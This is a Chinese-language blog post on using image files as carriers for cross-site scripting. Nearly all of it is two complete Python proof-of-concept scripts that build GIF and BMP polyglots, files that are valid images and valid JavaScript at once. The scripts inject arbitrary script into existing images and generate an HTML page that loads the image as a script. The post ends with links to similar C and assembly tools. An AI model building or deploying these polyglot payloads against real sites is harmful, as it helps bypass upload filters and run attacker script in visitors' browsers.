在xss中使用gif图片payloads

發表於 2017-02-15   |   分類於 信息安全   |  

正文

首先,以下脚本是一个向gif文件中注入JavaScript的脚本:

http://pastebin.com/6yUbfGX5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a GIF. ====================================================#
#======= or it creates a JavaScript Payload as a GIF.    ====================================================#
#======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS IS NOT PEP3 FORMATTED
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
								#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
								#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import os
#---------------------------------------------------------
def _hexify(num):
	"""
	Converts and formats to hexadecimal
	"""
	num = "%x" % num
	if len(num) % 2:
		num = '0'+num
	return num.decode('hex')
#---------------------------------------------------------
def _generate_and_write_to_file(payload, fname):
    """
    Generates a fake but valid GIF within scriting
    """
    f = open(fname, "wb")
    header = (b'\x47\x49\x46\x38\x39\x61'  #Signature + Version  GIF89a
                        b'\x2F\x2A' #Encoding /* it's a valid Logical Screen Width
                        b'\x0A\x00' #Smal Logical Screen Height
                        b'\x00' #GCTF
                        b'\xFF' #BackgroundColor
                        b'\x00' #Pixel Ratio
                        b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B' #GlobalColorTable + Blocks
                        b'\x2A\x2F' #Commenting out */
                        b'\x3D\x31\x3B' # enable the script side by introducing =1;
				        )
    trailer = b'\x3B'
	# I made this explicit, step by step .
    f.write(header)
    f.write(payload)
    f.write(trailer)
    f.close()
    return True
#---------------------------------------------------------
def _generate_launching_page(f):
	"""
	Creates the HTML launching page
	"""
	htmlpage ="""
								<html>
								<head><title>Opening an image</title> </head>
								<body>
									<img src=\"""" + f + """_malw.gif\"\>
									<script src= \"""" + f + """_malw.gif\"> </script>
								</body>
								</html>
			  """
	html = open("run.html", "wb")
	html.write(htmlpage);
	html.close()
	return True
#---------------------------------------------------------
def _inject_into_file(payload, fname):
	"""
	Injects the payload into existing GIF
	NOTE: if the GIF contains \xFF\x2A and/or \x2A\x5C might caouse issues
	"""
	# I know, I can do it all in memory and much more fast.
	# I wont do it here.
	with open(fname + "_malw.gif", "w+b") as fout:
		with open(fname, "rt") as fin:
			for line in fin:
				ls1 = line.replace(b'\x2A\x2F', b'\x00\x00')
				ls2 = ls1.replace(b'\x2F\x2A', b'\x00\x00')				
				fout.write(ls2)	            	
		fout.seek(6,0)
		fout.write(b'\x2F\x2A') #/*
	f = open(fname + "_malw.gif", "a+b") #appending mode
	f.write(b'\x2A\x2F\x3D\x31\x3B')
	f.write(payload)
	f.write(b'\x3B')
	f.close()
	return True
#---------------------------------------------------------
if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument("filename",help="the gif file name to be generated/or infected")
	parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
	parser.add_argument("-i", "--inject-to-existing-gif", action="store_true", help="inject into the current gif")
	args = parser.parse_args()
	print("""
					|======================================================================================================|
					| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
					| It is the end user's responsibility to obey all applicable local, state and federal laws.            |
					| Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
					|======================================================================================================|
					"""
         )
	if args.inject_to_existing_gif:
		 _inject_into_file(args.js_payload, args.filename)
	else:
		_generate_and_write_to_file(args.js_payload, args.filename)
	_generate_launching_page(args.filename)
	print "[+] Finished!"

还有这个,是向bmp中注入的:

http://pastebin.com/04y7ee3u

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a BMP. ====================================================#
#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
								#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
								#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import os
#---------------------------------------------------------
def _hexify(num):
	"""
	Converts and formats to hexadecimal
	"""
	num = "%x" % num
	if len(num) % 2:
		num = '0'+num
	return num.decode('hex')
#---------------------------------------------------------
#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
#;alert(_0xe428[0]);"
def _generate_and_write_to_file(payload, fname):
	"""
	Generates a fake but valid BMP within scriting
	"""
	f = open(fname, "wb")
	header = (b'\x42\x4D'  #Signature BM
						b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header
						b'\x00\x00\x00\x00' #Reserved
						b'\x00\x00\x00\x00' #bitmap data offset
						b''+ _hexify( len(payload) ) + #bitmap header size
					  b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
						b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
					  b'\x00\x00' #nb_plan
						b'\x00\x00' #nb per pixel
						b'\x00\x10\x00\x00' #compression type
						b'\x00\x00\x00\x00' #image size .. its ignored
						b'\x00\x00\x00\x01' #Horizontal resolution
						b'\x00\x00\x00\x01' #Vertial resolution
						b'\x00\x00\x00\x00' #number of colors
						b'\x00\x00\x00\x00' #number important colors
						b'\x00\x00\x00\x80' #palet colors to be complient
						b'\x00\x80\xff\x80' #palet colors to be complient
						b'\x80\x00\xff\x2A' #palet colors to be complient
						b'\x2F\x3D\x31\x3B' #*/=1;
						)
	# I made this explicit, step by step .
	f.write(header)
	f.write(payload)
	f.close()
	return True
#---------------------------------------------------------
def _generate_launching_page(f):
	"""
	Creates the HTML launching page
	"""
	htmlpage ="""
								<html>
								<head><title>Opening an image</title> </head>
								<body>
									<img src=\"""" + f + """\"\>
									<script src= \"""" + f + """\"> </script>
								</body>
								</html>
						"""
	html = open("run.html", "wb")
	html.write(htmlpage);
	html.close()
	return True
#---------------------------------------------------------
def _inject_into_file(payload, fname):
	"""
	Injects the payload into existing BMP
	NOTE: if the BMP contains \xFF\x2A might caouse issues
	"""
	# I know, I can do it all in memory and much more fast.
	# I wont do it here.
	f = open(fname, "r+b")
	b = f.read()
	b.replace(b'\x2A\x2F',b'\x00\x00')
	f.close()
	f = open(fname, "w+b")
	f.write(b)
	f.seek(2,0)
	f.write(b'\x2F\x2A')
	f.close()
	f = open(fname, "a+b")
	f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
	f.write(payload)
	f.close()
	return True
#---------------------------------------------------------
if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument("filename",help="the bmp file name to be generated/or infected")
	parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
	parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
	args = parser.parse_args()
	print("""
					|======================================================================================================|
					| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
					| It is the end user's responsibility to obey all applicable local, state and federal laws.            |
					| Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
					|======================================================================================================|
					""")
	if args.inject_to_existing_bmp:
		 _inject_into_file(args.js_payload, args.filename)
	else:
		_generate_and_write_to_file(args.js_payload, args.filename)
	_generate_launching_page(args.filename)
	print "[+] Finished!"

两个都是用python写的,其中,我们注意到他们的重点是:

对文件头部进行的处理

也有用C或者ASM做的工具:

https://github.com/jklmnn/imagejs

https://gist.github.com/ajinabraham/f2a057fb1930f94886a3

参考资料

[1] 浅析图片XSS中的哪些技术问题 - 嘶吼专业版

#XSS
图论
Android 逆向工具 dex2jar, enjarify 和 AXMLPrinter2